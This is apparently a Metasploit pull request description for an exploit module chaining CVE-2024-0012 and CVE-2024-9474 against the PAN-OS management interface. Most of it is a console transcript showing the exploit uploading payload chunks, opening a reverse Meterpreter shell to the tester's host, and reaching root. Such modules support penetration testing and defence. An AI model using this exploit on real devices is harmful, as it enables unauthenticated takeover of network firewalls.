This pull request adds an exploit module for the recent PAN-OS management interface unauthenticated RCE exploit chain (CVE-2024-0012 + CVE-2024-9474), based upon the technical analysis published by watchTowr.
The exploit module has been tested against PAN-OS 10.2.8 and 11.1.4.
Example
msf6 exploit(linux/http/panos_management_unauth_rce) > check
[+] 192.168.86.100:443 - The target is vulnerable.
msf6 exploit(linux/http/panos_management_unauth_rce) > exploit
[*] Started reverse TCP handler on 192.168.86.42:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[*] Uploading payload chunk 1 of 7...
[*] Uploading payload chunk 2 of 7...
[*] Uploading payload chunk 3 of 7...
[*] Uploading payload chunk 4 of 7...
[*] Uploading payload chunk 5 of 7...
[*] Uploading payload chunk 6 of 7...
[*] Uploading payload chunk 7 of 7...
[*] Amalgamating payload chunks...
[*] Executing payload...
[*] Meterpreter session 1 opened (192.168.86.42:4444 -> 192.168.86.100:52828) at 2024-11-19 16:09:19 +0000
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer : 192.168.86.100
OS : Red Hat (Linux 4.18.0-240.1.1.28.pan.x86_64)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter >
Note, commit de599a4 fixes a bug in how the individual chunk files are ensured to be sequential, and introduces a max payload size of 5670 chars, as we now need to decrement the chunk size by 1 character every 9 chunks.